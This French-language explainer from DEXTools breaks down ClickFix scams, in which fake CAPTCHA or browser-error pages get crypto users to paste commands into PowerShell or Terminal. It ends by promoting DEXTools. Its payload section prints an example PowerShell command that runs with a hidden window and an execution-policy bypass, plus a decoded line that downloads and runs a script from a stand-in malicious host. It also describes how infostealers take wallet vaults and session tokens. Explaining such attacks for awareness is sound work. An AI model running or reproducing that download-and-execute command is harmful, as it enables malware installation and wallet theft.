Escroqueries cryptographiques ClickFix : faux CAPTCHA qui volent des portefeuilles

Le phishing a évolué au-delà des fausses pages de connexion de base. Nous décomposons les mécanismes d’ingénierie sociale et d’exécution de terminal derrière les attaques de crypto-drainage ClickFix.
Faux CAPTCHA et vol de portefeuille crypto ClickFix
- L'émergence de Escroqueries cryptographiques ClickFix contourne complètement ces pare-feu mentaux traditionnels. Au lieu d'essayer de vous inciter à signer une transaction malveillante en chaîne ou à saisir vos clés privées dans un formulaire de phishing, les attaques ClickFix exploitent la relation opérationnelle entre un utilisateur et son système d'exploitation local. En mettant en scène des erreurs de navigateur artificielles très convaincantes et de faux écrans de vérification CAPTCHA, ces attaques incitent les utilisateurs à copier-coller des scripts cryptés directement dans leurs terminaux système locaux.
- Les vecteurs régissant le vol d'actifs numériques sont passés de la tromperie passive à une exploitation agressive des terminaux imposée par l'utilisateur. Pendant des années, le manuel de défense de base pour finance décentralisée Les participants à (DeFi) se sont fortement concentrés sur l'interception de fausses pages de connexion, l'audit des signatures d'approbation de contrats intelligents et la protection des phrases de départ brutes contre les entrées malveillantes. Si un allocateur maintenait l’habitude disciplinée de vérifier les URL et de vérifier soigneusement les écrans de confirmation du portefeuille matériel, son capital en chaîne restait structurellement isolé.
- Le navigateur Web n'a pas échoué ; la victime a fait preuve de prudence sous la pression. Ce guide décrit les astuces d'ingénierie sociale, les mécanismes de ligne de commande et les boucles d'exfiltration définissant l'architecture ClickFix.

1. La psychologie du piège : la fausse interface CAPTCHA
- Pour analyser une attaque ClickFix avec une précision technique, vous devez d'abord reconnaître qu'elle commence comme un pur jeu d'ingénierie sociale. L'attaque se manifeste généralement lorsqu'un utilisateur visite un blog Web3 compromis, un frontal de protocole dupliqué ou un faux portail de suivi.
Au lieu de présenter une invite de connexion au portefeuille évidente, la page déclenche un barrage mécanique immédiat.
- L'écran affiche une fenêtre interactive très soignée imitant un contrôle de sécurité standard, tel que le tourniquet de Cloudflare, une boucle Google reCAPTCHA v3 ou une alerte critique d'échec de mise à jour du navigateur (par exemple, « Erreur de mise à jour Chrome : échec d'ingestion Direct3D »).
- Lorsque l'utilisateur tente de terminer la vérification, l'interface affiche une notification ciblée indiquant que la vérification automatisée a échoué en raison d'un conflit de rendu localisé. L'écran fournit ensuite une « correction manuelle » étape par étape.
- En créant un problème technique urgent, l'arnaque fait passer l'état psychologique de la victime de consommateur défensif à technicien de dépannage, la rendant beaucoup plus disposée à suivre des commandes informatiques inhabituelles.
2. Le pipeline d'exécution de commandes : du presse-papiers au terminal
- Le véritable danger de la méthodologie ClickFix est sa capacité à contourner complètement la sécurité du bac à sable au niveau du navigateur. Les navigateurs Web sont conçus pour empêcher un code Internet non fiable de manipuler directement le matériel de votre ordinateur ou d'exécuter des applications logicielles en arrière-plan.
- ClickFix contourne cette barrière en trompant l'utilisateur agit comme un pont qui transporte les logiciels malveillants directement au-delà des murs de sécurité du navigateur.
La mécanique d'injection étape par étape
Étape 1 : Le piratage du presse-papiers : La fausse fenêtre contextuelle de vérification demande à l'utilisateur de cliquer sur un bouton intitulé « Copier le code de correctif » ou « Copier le jeton de vérification ». Lorsque vous cliquez dessus, le JavaScript du site Web copie une chaîne de commande cachée et malveillante directement dans le presse-papiers du système de l'utilisateur.
Étape 2 : Raccourcis d'ingestion de terminal : L'interface présente des instructions graphiques claires invitant l'utilisateur à ouvrir l'utilitaire de commande natif de son système d'exploitation. Pour les utilisateurs Windows, il leur demande d'appuyer sur
Windows Key + Rpour appeler la fenêtre Exécuter, tapezcmdoupowershellet appuyez sur Entrée. Pour les utilisateurs de macOS, il leur demande d'ouvrir l'application Terminal native via la recherche Spotlight.Étape 3 : Le déclencheur de collage : Les instructions demandent à l'utilisateur de cliquer avec le bouton droit dans la fenêtre du terminal ouvert ou d'appuyer sur
Ctrl + V(ouCmd + Vsur Mac) pour coller la "chaîne de vérification copiée" et appuyer sur Exécuter.
3. Déconstruction de la charge utile : l'exploit PowerShell Base64
Lorsque la victime colle la chaîne copiée dans son terminal, elle ne colle pas une clé de vérification inoffensive. Ils exécutent une chaîne de commande hautement compressée, obscurcie et fréquemment codée en Base64, conçue pour activer une boucle de téléchargement silencieuse.
Une charge utile de commande ClickFix typique destinée aux systèmes Windows utilise des outils utilitaires PowerShell standard pour extraire un fichier malveillant de deuxième étape à partir d'un serveur distant :
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc [Base64_ObfuscateUne fois décodée par le système, cette commande en arrière-plan se traduit par un script de téléchargement automatisé agressif :
IEX (New-Object Net.WebClient).DownloadString('https://malicious-distribution-node.cdn/payload.ps1')
La matrice des exploits du système
| Paramètre du terminal | Objectif de conformité du système | Objectif d'exploitation malveillante |
-NoP (Aucun profil) | Empêche le terminal de charger des profils utilisateur personnalisés. | Accélère la vitesse d'exécution et contourne les alertes de profil localisées. |
-NonI (Non interactif) | Désactive les invites interactives ou les messages de confirmation. | Garantit que le script s'exécute entièrement en arrière-plan sans nécessiter l'intervention de l'utilisateur. |
-W Hidden (Style de fenêtre masqué) | Force l'exécution du terminal à s'exécuter dans un état invisible. | Dissimule l'activité de téléchargement de la vue du bureau pour éviter d'alerter la victime. |
-Exec Bypass | Remplace les restrictions d'exécution du système par défaut. | Désactive explicitement les configurations de sécurité qui empêchent l'exécution de scripts non autorisés. |
IEX (Invocation-Expression) | Évalue et exécute n'importe quelle expression de chaîne en tant que commande locale. | Télécharge et exécute instantanément la charge utile de vol de portefeuille directement dans la mémoire active. |
4. Ce qui est volé : la charge utile du Wallet Infostealer
- Une fois que la charge utile de deuxième étape s'exécute dans la mémoire de votre système, elle déploie une classe d'utilitaire spécialisée connue sous le nom de Voleur d'informations (Infostealer), comme Lumma Stealer, Vidar ou Medusa. Ce malware ne cible pas vos documents généraux ni votre historique de recherche ; il est conçu avec précision pour attaquer l’empreinte de vos actifs numériques.
- L'Infostealer cible par programme les répertoires de dossiers locaux dans lesquels les navigateurs Web stockent les extensions et les fichiers d'état de l'application. Il gratte activement le
.ldbet.logCartes de données appartenant aux extensions Web3 populaires telles que MetaMask, Phantom, Coinbase Wallet et Rabby.
Ces fichiers locaux hébergent les clés de coffre-fort de votre portefeuille cryptées. Symétriquement, le malware extrait les cookies du navigateur et les jetons de session active.
- Toutes ces données récupérées sont regroupées dans une archive compressée et instantanément renvoyées via un canal crypté au serveur de l'attaquant. Une fois que les pirates possèdent ces jetons de session et ces coffres-forts locaux, ils peuvent forcer brutalement les mots de passe de votre portefeuille hors ligne ou détourner vos sessions actives, drainant ainsi tous les actifs de l'ensemble de votre portefeuille multi-chaînes en quelques minutes.
5. Pourquoi les protections de sécurité traditionnelles échouent
La principale raison pour laquelle les escroqueries cryptographiques ClickFix atteignent un taux de réussite élevé est qu'elles contournent systématiquement les outils antivirus standard et les extensions de navigateur Web.
La faille de sécurité structurelle : Parce que le site web malveillant ne force pas physiquement le téléchargement d'un
.exeou.dmgvia les canaux de navigateur standard, les systèmes de défense du navigateur ne voient absolument aucun risque. C'est l'utilisateur qui copie le texte et ouvre manuellement son terminal système.
Du point de vue du système d'exploitation, ouvrir PowerShell ou Terminal et exécuter une commande d'administration est une activité de routine et privilégiée explicitement autorisée par le propriétaire de l'ordinateur. Étant donné que le code s'exécute souvent directement dans la mémoire active sans enregistrer de fichiers exécutables lourds et non vérifiés sur le disque dur local, les logiciels antivirus de base basés sur les signatures ne parviennent souvent pas à signaler l'activité tant que la boucle d'exfiltration des données n'est pas terminée.
6. Stratégies de protection en chaîne et télémétrie via DEXTools
- Se défendre contre les menaces modernes d'ingénierie sociale nécessite de maintenir des limites strictes autour de votre terminal système, ainsi qu'une visibilité en temps réel sur les mouvements en direct sur la chaîne. Si vous pensez qu'une configuration d'actifs a été compromise par une violation potentielle d'informations locales, le suivi des journaux de données de portefeuille actifs et l'audit des autorisations contractuelles en cours sur des sites décentralisés sont la seule méthode pour préserver le capital restant.
- DEXTools fournit l'infrastructure de données analytiques critiques nécessaire pour surveiller l'activité des jetons et la stabilité du portefeuille sur plusieurs réseaux de couche 1 et de couche 2. En utilisant des explorateurs de paires en temps réel, le suivi des transactions multi-chaînes et des audits de sécurité des contrats de jetons, les acteurs du marché peuvent vérifier de manière indépendante si des interactions inattendues avec le portefeuille ou des transferts de fonds suspects se manifestent sur la chaîne.
Vous pouvez accéder à DEXTools ici et commencez à trader dès aujourd'hui !
Explication des attaques de drainage de portefeuille : comment reconnaître et éviter Liste de contrôle de sécurité du portefeuille : 10 étapes incontournables avant de conserver Meilleurs outils de sécurité des jetons en 2026 : contrôles d'arnaque, audits et examens des risques Escroqueries liées aux draineurs de portefeuille TON : comment rester en sécuritéAvertissement : Cet article est à titre informatif uniquement et ne constitue pas un conseil en investissement, un conseil financier, un conseil commercial ou tout autre type de conseil. DEXTools ne recommande pas d'acheter, de vendre ou de détenir une crypto-monnaie ou un jeton. Les utilisateurs doivent effectuer leurs propres recherches et consulter un conseiller financier qualifié avant de prendre toute décision d'investissement. Les investissements en crypto-monnaie sont volatils et à haut risque. DEXTools n'est pas responsable des pertes subies.